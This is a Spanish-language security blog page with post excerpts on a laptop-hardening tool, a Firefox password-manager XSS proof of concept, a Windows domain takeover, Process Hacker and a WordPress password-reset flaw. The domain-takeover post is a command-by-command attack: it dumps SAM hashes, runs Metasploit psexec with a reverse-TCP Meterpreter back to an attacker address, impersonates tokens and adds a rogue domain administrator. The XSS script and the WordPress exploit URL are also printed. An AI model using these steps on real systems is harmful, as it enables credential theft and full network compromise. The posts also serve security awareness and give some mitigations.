LapSec – Asegura tu Laptop con un Click

LapSec (Laptop Securer), es una herramienta destinada a automatizar los cambios más aconsejables para asegurar Windows en un ordenador portátil. Básicamente, agrupa en un solo botón varias tareas. No está destinado a asegurar “por completo” un sistema, sino que pretende facilitar las modificaciones más importantes para un “bastionado” de ordenador portátil, mucho más susceptible de ser perdido o sustraído. Evidentemente, estas medidas también son útiles para un ordenador de sobremesa. También es importante destacar que hay más medidas de seguridad aplicables a un portátil en particular y Windows en general, pero que no han sido implementadas en LapSec por resultar medidas más “genéricas” que se salen del objetivo del programa: activar funcionalidades de seguridad Windows especialmente útiles para portátiles. Fue desarrollado por Marcin “Icewall” Noga, parte del equipo de Hispasec con el objetivo principal de proteger nuestro portátil para que nadie acceda al sistema operativo, que la información confidencial quede inaccesible y que permita realizar un cifrado seguro, a continuación les dejo la lista de funcionalidades completa: Eliminar el cifrado LM de las contraseñas (en Vista y 7 no es necesario). Sobrescribir el archivo de memoria paginada (pagefile.sys) Ocultar el nombre del usuario que el Sistema Operativo muestra en la pantalla de presentación Activar la protección por contraseña del salvapantallas. Eliminar la autoejecución de archivos cuando se introducen unidades extraíbles. Comprobar la existencia de contraseña del usuario. Comprobar la complejidad de las contraseñas. Comprueba la activación de la contraseña en la consola de recuperación. Deshabilitar el almacenamiento de contraseñas en el navegador Internet Explorer. Deshabilitar la hibernación (hibernation.sys). Deshabilitar la cuenta de administrador y de invitado del sistema. Cifrado de la carpeta Mis Documentos. Exportación del certificado de forma sencilla para casos de “desastre”. Descargar LapSec para Asegurar tu Computador Portatil Mas Información: Pagina Oficial de...

Leer Más

Robando claves por XSS del Administrador de Contraseñas del Firefox

Gracias a un mensaje de Tom Brennan, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (Cross-site scripting) obtener la clave de un usuario almacenada en el navegador. El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo “password” y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar. Si le echamos un vistoso al formulario utilizando el plugin Web Developer para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso: El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox: <script> document.write('<form><input id=p type=password style=visibility:hidden></form>'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); </script> Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos. En este caso contar con “clave maestra” en el administrador de contraseñas del Mozilla Firefox no supone una “barrera” para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave. Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado. Actualización: Un fallo similar fue reportado en el 2006 y supuestamente fue resuelto “VERIFIED FIXED”, pero acabo de probar con la prueba de concepto que publicaron en esa ocasión y sigue siendo vulnerable. Recomendaciones: Escribe “about:config” en la barra del Firefox para desactivar (poner en “false”) la función signon.autofillForms Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo. Utilizar el plugin NoScript (si no hay inyección de código, no hay problema) No utilizar el Administrador de Contraseñas de Mozilla Firefox (ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador), en vez de el utilizar servicios gratuitos como LastPass (al que por cierto le debo un articulo entero) Mas Información: XSS demo for stealing passwords from the Firefox password...

Leer Más

¿Cómo tomar control de un Dominio en Windows?

Los “dominios” en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de windows. En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente: REQUISITOS Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario) Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social) Una copia de BackTrack 4 Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows: Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos: mount /dev/sda1 /mnt/sda1 Montamos la particion de la maquina windows cd /mnt/sda1/WINDOWS/system32/config accedemos a la carpeta dodne se encuentra el archivo SAM samdump2 system SAM sacamos los hash de los usuarios en la maquina windows msfconsole ejecutamos el metasploit por consola use windows/smb/psexec utilizamos el psexec exploit -p windows/meterpreter/reverse_tcp -o utilizamos la shell meterpreter LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j configuramos las opciones del exploit sessions -i 1 una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra use incognito utilizamos el modulo incognito de meterpreter list_tokens -u mostramos los tokens impersonate_token mydomain\\domainadmin tomamos las credenciales del administrador de dominio execute -f cmd.exe -i -t lanzamos la consola de windows net user hack MPass5678 /add /domain Agregamos el usuario “hack” con clave “MPass46782” al dominio net group “Domain Admins” hack /add /domain metemos el usuario hack al grupo de administradores de dominio Ya hemos tomado el control del dominio de windows Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean. PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de...

Leer Más

Process Hacker, Mata Procesos en Windows

Process Hacker es un administrador de procesos para windows, totalmente libre y open source, algo así como un “administrador de tareas” con esteroídes, ya que permite ver procesos ocultos, editar la memoria del sistema, matar procesos que el “administrador de tareas” de windows no permite entre otras funciones muy útiles. Existen muchos programas de este tipo, uno de los mas populares es el Process Explorer de la empresa sysinternals que fue comprada por Microsoft, precisamente por esa compra process explorer ha perdido adeptos (aunque no calidad) y muchos han optado por alternativas totalmente libres como Process Hacker. A diferencia de otros administradores de tareas, Process Hacker cuenta con su propio drivers para manejar los procesos del sistema, lo que le permite matar procesos incluso si estos están siendo utilizados por el sistema operativo u otras aplicaciones, esta funcionalidad también le permite ver procesos que pueden estar ocultos al “administrador de tareas” de windows, pero no solo podemos ver y eliminar procesos, también podemos realizar las mismas tareas con los servicios del sistema, podemos ver que aplicaciones están haciendo uso de nuestra conexión y con quien se están comunicando. Sólo funciona en Windows XP o superior de 32 bits y requiere del .NET Framework 2.0. En las versiones de 64 bits su funcionalidad se ve enormemente reducida a causa de que sólo son permitidos drivers firmados con un certificado digital válido emitido por una entidad de confianza, por lo que si deseamos poder cargar el driver de Process Hacker deberemos deshabilitar esta característica que viene por defecto en los sistemas de 64 bits. Descargar Process Hacker, excelente administrador de Procesos en Microsoft Windows Para Mas Información: Pagina Oficial del Process Hacker Pagina Oficial del Process...

Leer Más

Reseteo Remoto del Password de Admin en WordPress

No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3. Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente. Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente: http://PAGINAAQUI.COM/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código: if ( empty( $key ) ) y remplazarlo por: if ( empty( $key ) || is_array( $key ) ) Aunque como siempre es recomendable que actualices tu versión a la WordPress a la 2.8.4 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para...

Leer Más

Congreso Hacker Colombia

Aprende ONLINE Técnicas HACKING y Seguridad Informática guiad@ por Profesionales RECONOCIDOS con más de 10 años de experiencia REAL en el campo de la Seguridad Informática

Toma acción !AHORA¡
miles ya lo han hecho

NUNCA te enviaremos spam.

  • No necesitas conocimiento previo (De 0 a Ninja)
  • Docentes reconocidos en el medio y con experiencia REAL
  • Clases ONLINE en VIVO que luego podrás repasar si lo deseas desde cualquier parte o cualquier dispositivo
  • Contenidos EXCLUSIVOS generados por nuestros docentes
  • Contacto constante con el docente por distintos medios, antes, durante y después de las clases
  • Laboratorios en linea para que nuestros alumnos practiquen sus conocimientos sin problemas
  • Exclusivo FORO VIP de Alumnos y Ex-Alumnos donde se continúa el aprendizaje y se comparte conocimiento
  • Te entregamos un diploma de certificación por cada curso
  • Miles de ex-alumnos felices